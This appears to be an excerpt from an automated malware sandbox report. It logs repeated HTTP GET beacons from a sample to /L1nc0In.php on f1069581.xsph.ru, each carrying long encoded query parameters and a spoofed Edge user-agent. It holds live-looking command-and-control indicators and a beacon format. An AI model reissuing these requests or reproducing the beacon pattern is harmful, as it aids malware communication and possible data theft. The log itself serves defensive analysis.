/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
